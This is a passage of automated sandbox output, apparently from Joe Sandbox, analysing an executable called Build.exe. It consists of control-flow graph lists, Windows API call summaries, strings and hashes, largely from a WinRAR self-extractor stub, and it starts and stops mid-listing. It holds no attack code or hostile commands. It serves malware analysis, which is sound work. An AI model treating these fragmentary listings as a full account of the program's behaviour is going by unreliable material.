37ee5c-37ee63 444->481 482 37ee6b 444->482 451 37ee83-37ee9b call 386433 445->451 452 37eeaf-37eed2 call 386433 * 2 445->452 466 37ec9d-37eca9 call 36c367 449->466 467 37eb4b-37eb5f SetFileAttributesW 449->467 451->452 468 37ee9d-37eeaa call 372663 451->468 452->442 486 37eed4-37eee2 call 372663 452->486 497 37ef6b-37ef6f 456->497 457->456 462 37ef10-37ef12 457->462 462->456 466->380 470 37ec05-37ec15 GetFileAttributesW 467->470 471 37eb65-37eb98 call 36d8ac call 36d52f call 386433 467->471 468->452 470->449 478 37ec17-37ec26 DeleteFileW 470->478 506 37ebab-37ebb9 call 36dcd9 471->506 507 37eb9a-37eba9 call 386433 471->507 478->449 484 37ec28-37ec2b 478->484 487 37f73c-37f741 call 3813f9 481->487 488 37ee69 481->488 489 37ee70-37ee72 482->489 491 37ec2f-37ec5b call 364c00 GetFileAttributesW 484->491 486->442 488->489 489->445 504 37ec2d-37ec2e 491->504 505 37ec5d-37ec73 MoveFileW 491->505 497->380 502 37ef75-37ef89 SendMessageW 497->502 502->380 504->491 505->449 508 37ec75-37ec7f MoveFileExW 505->508 506->466 513 37ebbf-37ebfe call 386433 call 382640 506->513 507->506 507->513 508->449 513->470
                                                                                          APIs
                                                                                            • Part of subcall function 0037D5DD: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0037D6C7
                                                                                            • Part of subcall function 0037C5DD: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0037C5E5
                                                                                          • SetFileAttributesW.KERNEL32(?,00000000,?,?,?,00000800,?,92C77967,?,00000000,00000001), ref: 0037EB53
                                                                                          • _wcslen.LIBCMT ref: 0037EB8D
                                                                                          • _wcslen.LIBCMT ref: 0037EBA1
                                                                                          • _wcslen.LIBCMT ref: 0037EBC6
                                                                                          • GetFileAttributesW.KERNEL32(?), ref: 0037EC0C
                                                                                          • DeleteFileW.KERNEL32(?), ref: 0037EC1E
                                                                                          • _swprintf.LIBCMT ref: 0037EC43
                                                                                          • GetFileAttributesW.KERNEL32(?), ref: 0037EC52
                                                                                          • MoveFileW.KERNEL32(?,?), ref: 0037EC6B
                                                                                          • MoveFileExW.KERNEL32(?,00000000,00000004), ref: 0037EC7F
                                                                                          • _wcslen.LIBCMT ref: 0037ECFA
                                                                                          • _wcslen.LIBCMT ref: 0037ED03
                                                                                          • SetWindowTextW.USER32(?,?), ref: 0037ED62
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$_wcslen$Attributes$Move$CurrentDeleteDirectoryEnvironmentExpandStringsTextWindow_swprintf
                                                                                          • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                                          • API String ID: 2983673336-312220925
                                                                                          • Opcode ID: 839f56f8370482eff62716640e33ee2856f4983b11a5f88d131f77b0c7c4f259
                                                                                          • Instruction ID: fea5fb61b8315b935d2655d57207332ae2ea0a09b3b8d7a4d2bcfa25e556168f
                                                                                          • Opcode Fuzzy Hash: 839f56f8370482eff62716640e33ee2856f4983b11a5f88d131f77b0c7c4f259
                                                                                          • Instruction Fuzzy Hash: 6AF15272900249AEDB33EFA4DC85EEF37BCBF49310F04856AE909DB150EB749A458B50

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                            • Part of subcall function 0037290A: GetModuleHandleW.KERNEL32 ref: 00372937
                                                                                            • Part of subcall function 0037290A: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00372949
                                                                                            • Part of subcall function 0037290A: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00372973
                                                                                            • Part of subcall function 0037C5DD: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0037C5E5
                                                                                            • Part of subcall function 0037CCD9: OleInitialize.OLE32(00000000), ref: 0037CCF2
                                                                                            • Part of subcall function 0037CCD9: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0037CD29
                                                                                            • Part of subcall function 0037CCD9: SHGetMalloc.SHELL32(003AC460), ref: 0037CD33
                                                                                          • GetCommandLineW.KERNEL32 ref: 003803C9
                                                                                          • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 003803F3
                                                                                          • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007402), ref: 00380404
                                                                                          • UnmapViewOfFile.KERNEL32(00000000), ref: 00380455
                                                                                            • Part of subcall function 0037FFDD: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0037FFFE
                                                                                            • Part of subcall function 0037FFDD: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00380038
                                                                                            • Part of subcall function 00371421: _wcslen.LIBCMT ref: 00371445
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0038045C
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe,00000800), ref: 00380476
                                                                                          • SetEnvironmentVariableW.KERNEL32(sfxname,C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe), ref: 00380482
                                                                                          • GetLocalTime.KERNEL32(?), ref: 0038048D
                                                                                          • _swprintf.LIBCMT ref: 003804E1
                                                                                          • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 003804F6
                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 003804FD
                                                                                          • LoadIconW.USER32(00000000,00000064), ref: 00380514
                                                                                          • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001DAE0,00000000), ref: 00380565
                                                                                          • Sleep.KERNEL32(?), ref: 00380593
                                                                                          • DeleteObject.GDI32 ref: 003805CC
                                                                                          • DeleteObject.GDI32(?), ref: 003805DC
                                                                                          • CloseHandle.KERNEL32 ref: 0038061F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf_wcslen
                                                                                          • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe$STARTDLG$pP:$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                          • API String ID: 3014515783-3491473713
                                                                                          • Opcode ID: ab1750be4f4c158b7394221bb837a0e1380cddedf91d0754b37bee16ae601a5f
                                                                                          • Instruction ID: d230d114b8989b61e6ea3af723b08285db37420c3d189f20c11e0f11ce788ff2
                                                                                          • Opcode Fuzzy Hash: ab1750be4f4c158b7394221bb837a0e1380cddedf91d0754b37bee16ae601a5f
                                                                                          • Instruction Fuzzy Hash: B7710371504300ABD333BB65EC4AF6B7AACFB46744F00841AF549D62A2DF3A9948CB61

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 606 37c652-37c66f FindResourceW 607 37c675-37c686 SizeofResource 606->607 608 37c76b 606->608 607->608 610 37c68c-37c69b LoadResource 607->610 609 37c76d-37c771 608->609 610->608 611 37c6a1-37c6ac LockResource 610->611 611->608 612 37c6b2-37c6c7 GlobalAlloc 611->612 613 37c763-37c769 612->613 614 37c6cd-37c6d6 GlobalLock 612->614 613->609 615 37c75c-37c75d GlobalFree 614->615 616 37c6dc-37c6fa call 384250 614->616 615->613 620 37c755-37c756 GlobalUnlock 616->620 621 37c6fc-37c71e call 37c5b6 616->621 620->615 621->620 626 37c720-37c728 621->626 627 37c743-37c751 626->627 628 37c72a-37c73e GdipCreateHBITMAPFromBitmap 626->628 627->620 628->627 629 37c740 628->629 629->627
                                                                                          APIs
                                                                                          • FindResourceW.KERNELBASE(?,PNG,00000000,?,?,?,0037DA3D,00000066), ref: 0037C665
                                                                                          • SizeofResource.KERNEL32(00000000,?,?,?,0037DA3D,00000066), ref: 0037C67C
                                                                                          • LoadResource.KERNEL32(00000000,?,?,?,0037DA3D,00000066), ref: 0037C693
                                                                                          • LockResource.KERNEL32(00000000,?,?,?,0037DA3D,00000066), ref: 0037C6A2
                                                                                          • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0037DA3D,00000066), ref: 0037C6BD
                                                                                          • GlobalLock.KERNEL32(00000000,?,?,?,?,?,0037DA3D,00000066), ref: 0037C6CE
                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0037C756
                                                                                            • Part of subcall function 0037C5B6: GdipAlloc.GDIPLUS(00000010), ref: 0037C5BC
                                                                                          • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0037C737
                                                                                          • GlobalFree.KERNEL32(00000000), ref: 0037C75D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
                                                                                          • String ID: FjuK8$PNG
                                                                                          • API String ID: 541704414-3760884945
                                                                                          • Opcode ID: 91702d821ddf63dcfd7f36de150681cdfc1238a1165c61995b52c3e9194b0719
                                                                                          • Instruction ID: 82dc30219507cdeb12e4d719f1b49221b26c54dc22f6e6caaf3f35046d9d1db8
                                                                                          • Opcode Fuzzy Hash: 91702d821ddf63dcfd7f36de150681cdfc1238a1165c61995b52c3e9194b0719
                                                                                          • Instruction Fuzzy Hash: F3317E71201702AFD7269F21EC89D1B7FACEF85751B05452AF90A92261EF36D800CFA0
                                                                                          APIs
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000800,92C77967), ref: 0036F9CD
                                                                                            • Part of subcall function 0036E208: _wcslen.LIBCMT ref: 0036E210
                                                                                            • Part of subcall function 00372663: _wcslen.LIBCMT ref: 00372669
                                                                                            • Part of subcall function 00373D10: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,92C77967,?,?,92C77967,00000001,0036DA04,00000000,92C77967,?,0001048A,?,?), ref: 00373D2C
                                                                                          • _wcslen.LIBCMT ref: 0036FD00
                                                                                          • __fprintf_l.LIBCMT ref: 0036FE50
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcslen$ByteCharFileModuleMultiNameWide__fprintf_l
                                                                                          • String ID: ,$$%s:$*messages***$*messages***$@%s:$RTL$|l9
                                                                                          • API String ID: 2646189078-2567830898
                                                                                          • Opcode ID: c54a56fca3c582b97c6b8d2396f4266059c793f7c0eac800e34ee9cc3adcbd48
                                                                                          • Instruction ID: 89f41e6d93b9d38ec5a5c3802dcba611bea221114ae8a69fa5beb1d9019eaa87
                                                                                          • Opcode Fuzzy Hash: c54a56fca3c582b97c6b8d2396f4266059c793f7c0eac800e34ee9cc3adcbd48
                                                                                          • Instruction Fuzzy Hash: F1420371900319EFCF36EFA4D841AEEB3B4FF08710F51802AE909AB285EB755A41CB54

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1055 36c4a8-36c4e3 call 381590 1058 36c4e5-36c4f0 FindFirstFileW 1055->1058 1059 36c548-36c551 FindNextFileW 1055->1059 1060 36c563-36c606 call 37268b call 36e27e call 373724 * 3 1058->1060 1062 36c4f2-36c507 call 36da1e 1058->1062 1059->1060 1061 36c553-36c561 GetLastError 1059->1061 1066 36c60b-36c62c call 3810f9 1060->1066 1063 36c53d-36c543 1061->1063 1071 36c522-36c52b GetLastError 1062->1071 1072 36c509-36c520 FindFirstFileW 1062->1072 1063->1066 1073 36c52d-36c530 1071->1073 1074 36c53b 1071->1074 1072->1060 1072->1071 1073->1074 1077 36c532-36c535 1073->1077 1074->1063 1077->1074 1079 36c537-36c539 1077->1079 1079->1063
                                                                                          APIs
                                                                                          • FindFirstFileW.KERNELBASE(?,?,00000000,?,?,?,0036C39F,000000FF,?,?,?,?,003687BC,?,?,00000000), ref: 0036C4E6
                                                                                            • Part of subcall function 0036DA1E: _wcslen.LIBCMT ref: 0036DA59
                                                                                          • FindFirstFileW.KERNELBASE(?,00000000,?,?,00000800,?,?,0036C39F,000000FF,?,?,?,?,003687BC,?,?), ref: 0036C516
                                                                                          • GetLastError.KERNEL32(?,?,00000800,?,?,0036C39F,000000FF,?,?,?,?,003687BC,?,?,00000000,0000003A), ref: 0036C522
                                                                                          • FindNextFileW.KERNEL32(?,?,00000000,?,?,?,0036C39F,000000FF,?,?,?,?,003687BC,?,?,00000000), ref: 0036C549
                                                                                          • GetLastError.KERNEL32(?,?,0036C39F,000000FF,?,?,?,?,003687BC,?,?,00000000,0000003A,?,0000003A,00000802), ref: 0036C555
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                                                          • String ID:
                                                                                          • API String ID: 42610566-0
                                                                                          • Opcode ID: 6726c03091f685b7810cbd4142fa68fa4f7108179e80b91e4052de0e41ad5a42
                                                                                          • Instruction ID: d5ff82575ba5d78f8711b976a00cfb75c7ccdfef736baa6689026dd58c66faed
                                                                                          • Opcode Fuzzy Hash: 6726c03091f685b7810cbd4142fa68fa4f7108179e80b91e4052de0e41ad5a42
                                                                                          • Instruction Fuzzy Hash: D54192B1608741AFC725EF25C885AEAF3ECBB89340F004A1EF5DAD3240D735A954CBA1
                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32(?,?,0038A616,?,0039F7B0,0000000C,0038A76D,?,00000002,00000000), ref: 0038A661
                                                                                          • TerminateProcess.KERNEL32(00000000,?,0038A616,?,0039F7B0,0000000C,0038A76D,?,00000002,00000000), ref: 0038A668
                                                                                          • ExitProcess.KERNEL32 ref: 0038A67A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                          • String ID:
                                                                                          • API String ID: 1703294689-0
                                                                                          • Opcode ID: e934266d7de9c6bff6d36afa84e51a6566b3098623f8ad4d4886b6d3aab74f3f
                                                                                          • Instruction ID: 3454cd7507ace61c02892aace2b8dffed63643e140eb046d3e452a14c2154f39
                                                                                          • Opcode Fuzzy Hash: e934266d7de9c6bff6d36afa84e51a6566b3098623f8ad4d4886b6d3aab74f3f
                                                                                          • Instruction Fuzzy Hash: D8E0B631441A08AFDF137F64DD4AA483B6AEB50741F054456F8098A236EB36ED42CB95

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 0 37290a-372941 call 381590 GetModuleHandleW 3 372943-372953 GetProcAddress 0->3 4 372999-372bfa 0->4 7 372955-37296b 3->7 8 37296d-37297d GetProcAddress 3->8 5 372c00-372c0d call 389e7e 4->5 6 372cda 4->6 9 372cdc-372d08 GetModuleFileNameW call 36e208 call 37268b 5->9 17 372c13-372c41 GetModuleFileNameW CreateFileW 5->17 6->9 7->8 8->4 11 37297f-372994 8->11 24 372d0a-372d16 call 36d076 9->24 11->4 19 372c47-372c53 SetFilePointer 17->19 20 372ccc-372cd8 CloseHandle 17->20 19->20 23 372c55-372c71 ReadFile 19->23 20->9 23->20 25 372c73-372c7f 23->25 33 372d45-372d6c call 36e27e GetFileAttributesW 24->33 34 372d18-372d23 call 3728ab 24->34 27 372c85-372ca4 25->27 28 372ede-372ee3 call 3813f9 25->28 30 372cc1-372cca call 3723d6 27->30 30->20 39 372ca6-372cc0 call 3728ab 30->39 42 372d76 33->42 43 372d6e-372d72 33->43 34->33 45 372d25-372d35 34->45 39->30 47 372d78-372d7d 42->47 43->24 46 372d74 43->46 49 372d40-372d43 45->49 46->47 50 372db4-372db6 47->50 51 372d7f 47->51 49->33 49->43 52 372ec3-372edb call 3810f9 50->52 53 372dbc-372dd3 call 36e252 call 36d076 50->53 54 372d81-372da8 call 36e27e GetFileAttributesW 51->54 66 372dd5-372e36 call 3728ab * 2 call 370597 call 364c00 call 370597 call 37c774 53->66 67 372e3b-372e6e call 364c00 AllocConsole 53->67 62 372db2 54->62 63 372daa-372dae 54->63 62->50 63->54 65 372db0 63->65 65->50 73 372ebb-372ebd ExitProcess 66->73 72 372e70-372eb5 GetCurrentProcessId AttachConsole call 386433 GetStdHandle WriteConsoleW Sleep FreeConsole 67->72 67->73 72->73
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNEL32 ref: 00372937
                                                                                          • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00372949
                                                                                          • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00372973
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00372C1D
                                                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00372C37
                                                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00372C4B
                                                                                          • ReadFile.KERNEL32(00000000,?,00007FFE,$o9,00000000), ref: 00372C69
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00372CCD
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00372CE6
                                                                                          • CompareStringW.KERNEL32(00000400,00001001,po9,?,DXGIDebug.dll,?,$o9,?,00000000,?,00000800), ref: 00372D3A
                                                                                          • GetFileAttributesW.KERNELBASE(?,?,$o9,00000800,?,00000000,?,00000800), ref: 00372D64
                                                                                          • GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 00372DA0
                                                                                            • Part of subcall function 003728AB: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 003728D4
                                                                                            • Part of subcall function 003728AB: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00371309,Crypt32.dll,00000000,00371383,00000200,?,00371366,00000000,00000000,?), ref: 003728F4
                                                                                          • _swprintf.LIBCMT ref: 00372E12
                                                                                          • _swprintf.LIBCMT ref: 00372E5E
                                                                                          • AllocConsole.KERNEL32 ref: 00372E66
                                                                                          • GetCurrentProcessId.KERNEL32 ref: 00372E70
                                                                                          • AttachConsole.KERNEL32(00000000), ref: 00372E77
                                                                                          • _wcslen.LIBCMT ref: 00372E8C
                                                                                          • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00372E9D
                                                                                          • WriteConsoleW.KERNEL32(00000000), ref: 00372EA4
                                                                                          • Sleep.KERNEL32(00002710), ref: 00372EAF
                                                                                          • FreeConsole.KERNEL32 ref: 00372EB5
                                                                                          • ExitProcess.KERNEL32 ref: 00372EBD
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite_wcslen
                                                                                          • String ID: $o9$$r9$$s9$(p9$(t9$,q9$4s9$<$<o9$<r9$@p9$DXGIDebug.dll$Dq9$Dt9$Ls9$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$Xo9$Xp9$\q9$\t9$`r9$ds9$dwmapi.dll$kernel32$po9$pp9$tq9$uxtheme.dll$xr9$xs9$xt9$o9$p9
                                                                                          • API String ID: 270162209-1907203880
                                                                                          • Opcode ID: d97568c1774ceb3adeec9583e441532c359fc116833c8dfe6efe092befc33e7a
                                                                                          • Instruction ID: e8d84973be4aa3d184c3cf60e4ea7f3ac298479fce9a3446474c6748ba5ad8ce
                                                                                          • Opcode Fuzzy Hash: d97568c1774ceb3adeec9583e441532c359fc116833c8dfe6efe092befc33e7a
                                                                                          • Instruction Fuzzy Hash: 7CD1A0B501D3859BDB339F50D889BDFBBECAB85304F00491DF5899A291CBB58548CBA2
                                                                                          APIs
                                                                                            • Part of subcall function 00361366: GetDlgItem.USER32(00000000,00003021), ref: 003613AA
                                                                                            • Part of subcall function 00361366: SetWindowTextW.USER32(00000000,003965F4), ref: 003613C0
                                                                                          • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0037DC06
                                                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0037DC24
                                                                                          • IsDialogMessageW.USER32(?,?), ref: 0037DC37
                                                                                          • TranslateMessage.USER32(?), ref: 0037DC45
                                                                                          • DispatchMessageW.USER32(?), ref: 0037DC4F
                                                                                          • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0037DC72
                                                                                          • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 0037DC95
                                                                                          • GetDlgItem.USER32(?,00000068), ref: 0037DCB8
                                                                                          • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0037DCD3
                                                                                          • SendMessageW.USER32(00000000,000000C2,00000000,003965F4), ref: 0037DCE6
                                                                                            • Part of subcall function 0037F77B: _wcslen.LIBCMT ref: 0037F7A5
                                                                                          • SetFocus.USER32(00000000), ref: 0037DCED
                                                                                          • _swprintf.LIBCMT ref: 0037DD4C
                                                                                            • Part of subcall function 00364C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00364C13
                                                                                          • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,00000800), ref: 0037DDAF
                                                                                          • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,00000800), ref: 0037DDD7
                                                                                          • GetTickCount.KERNEL32 ref: 0037DDF5
                                                                                          • _swprintf.LIBCMT ref: 0037DE0D
                                                                                          • GetLastError.KERNEL32(?,00000011), ref: 0037DE3F
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,00000000,00000000,00000000,?,00000800), ref: 0037DE92
                                                                                          • _swprintf.LIBCMT ref: 0037DEC9
                                                                                          • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007402,winrarsfxmappingfile.tmp,?,?,?,?,003B3482,00000200), ref: 0037DF1D
                                                                                          • GetCommandLineW.KERNEL32(?,?,?,?,003B3482,00000200), ref: 0037DF33
                                                                                          • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,003B3482,00000400,00000001,00000001,?,?,?,?,003B3482,00000200), ref: 0037DF8A
                                                                                          • ShellExecuteExW.SHELL32(?), ref: 0037DFB2
                                                                                          • Sleep.KERNEL32(00000064,?,?,?,?,003B3482,00000200), ref: 0037DFFA
                                                                                          • UnmapViewOfFile.KERNEL32(?,?,0000421C,003B3482,00000400,?,?,?,?,003B3482,00000200), ref: 0037E023
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,003B3482,00000200), ref: 0037E02C
